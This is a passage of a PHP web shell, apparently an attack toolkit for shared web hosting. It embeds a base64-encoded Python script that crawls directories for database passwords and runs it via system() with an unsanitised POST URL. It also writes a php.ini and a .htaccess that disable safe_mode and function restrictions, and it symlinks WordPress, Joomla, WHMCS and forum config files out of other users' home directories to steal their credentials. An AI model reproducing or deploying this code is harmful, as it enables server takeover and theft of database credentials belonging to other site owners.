=\r\n\'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=\';\r\n$file = fopen("cp.py","w+");\r\n$write = fwrite ($file ,base64_decode($cp));\r\nfclose($file);\r\nchmod("cp.py",0755);\r\n$url = $_POST[\'url\'];\r\necho"<center>\r\n<textarea cols=\\"90\\" rows=\\"20\\" name=\\"usernames\\">";\r\nsystem("python cp.py $url config");\r\nunlink (\'cp.py\');\r\necho"</textarea>\r\n</center>";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'matikan\']==\'sekatan\'){\r\n@error_reporting(0);\r\n$phpini =\r\n\'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==\';\r\n$file = fopen("php.ini","w+");\r\n$write = fwrite ($file ,base64_decode($phpini));\r\nfclose($file);\r\n$htaccess =\r\n\'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==\';\r\n$file = fopen(".htaccess","w+");\r\n$write = fwrite ($file ,base64_decode($htaccess));\r\necho "<hr><center><b>DONE!";\r\necho "<hr><center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\nexit;\r\n}\r\nif($_POST[\'mendapatkan\']==\'passwd\'){\r\n@set_magic_quotes_runtime(0);\r\nob_start();\r\nerror_reporting(0);\r\n@set_time_limit(0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'output_buffering\',0);\r\n$fn = $_POST[\'foldername\'];\r\n//all function here\r\n\r\nfunction syml($usern,$pdomain)\r\n\t{\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home2/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~7.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/connect.php\',$pdomain.\'~~8.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/mk_conf.php\',$pdomain.\'~~mk-portale1.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/config.php\',$pdomain.\'~~12.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/settings.php\',$pdomain.\'~~Smf.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/includes/functions.php\',$pdomain.\'~~phpbb3.txt\');\r\n\t\tsymlink(\'/home3/\'.$usern.\'/public_html/include/db.php\',$pdomain.\'~~infinity.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/vb/includes/config.php\',$pdomain.\'~~vBulletin1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includes/config.php\',$pdomain.\'~~vBulletin2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~vBulletin3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/cc/includes/config.php\',$pdomain.\'~~vBulletin4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/config.php\',$pdomain.\'~~Phpbb1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/forum/includes/config.php\',$pdomain.\'~~Phpbb2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/wp-config.php\',$pdomain.\'~~Wordpress1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/wp-config.php\',$pdomain.\'~~Wordpress2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/configuration.php\',$pdomain.\'~~Joomla1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/blog/configuration.php\',$pdomain.\'~~Joomla2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/joomla/configuration.php\',$pdomain.\'~~Joomla3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whm/configuration.php\',$pdomain.\'~~Whm1.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmc/configuration.php\',$pdomain.\'~~Whm2.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/support/configuration.php\',$pdomain.\'~~Whm3.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/client/configuration.php\',$pdomain.\'~~Whm4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billings/configuration.php\',$pdomain.\'~~Whm5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/billing/configuration.php\',$pdomain.\'~~Whm6.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/clients/configuration.php\',$pdomain.\'~~Whm7.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/whmcs/configuration.php\',$pdomain.\'~~Whm8.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/order/configuration.php\',$pdomain.\'~~Whm9.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/conf.php\',$pdomain.\'~~5.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/admin/config.php\',$pdomain.\'~~4.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/conf_global.php\',$pdomain.\'~~invisio.txt\');\r\n\t\tsymlink(\'/home4/\'.$usern.\'/public_html/includ